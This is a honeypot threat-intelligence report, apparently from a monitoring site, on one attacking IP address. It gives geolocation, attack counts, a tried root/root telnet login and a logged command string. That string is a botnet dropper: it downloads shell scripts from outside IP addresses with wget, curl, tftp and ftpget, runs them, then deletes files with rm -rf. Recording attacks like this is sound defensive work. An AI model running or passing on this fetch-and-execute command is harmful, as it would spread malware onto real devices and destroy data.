TROYANOSYVIRUS
Active Threat β€’ LOW

35.240.238.240

First Detection3/29/2026
Last Activity3/29/2026
ISPGoogle LLC
🎯
8
Total Attacks
πŸ”Œ
1
Ports
πŸ“‘
1
Attack Types
🦠
2
Malware

Geolocation

Country
πŸ‡ΈπŸ‡¬ Singapore
City
Singapore
ASN
AS396982
ISP
Google LLC

Attack Types

ssh_telnet_honeypot

Attacked Ports

23

Associated Malware

Attempted Credentials

πŸ”root/root
1x

Executed Commands

$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://38.83.138.59:25884/nz.sh; curl -O http://38.83.138.59:25884/nz.sh; chmod 777 nz.sh; sh nz.sh; tftp 206.189.22.92 -c get nz.sh; chmod 777 nz.sh; sh nz.sh; tftp -r 3.sh -g 206.189.22.92; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 206.189.22.92 2.sh 2.sh; sh 2.sh; rm -rf nz.sh nz.sh 3.sh 2.sh; rm -rf *1x

Risk Assessment

20
/100
LowMediumHighCritical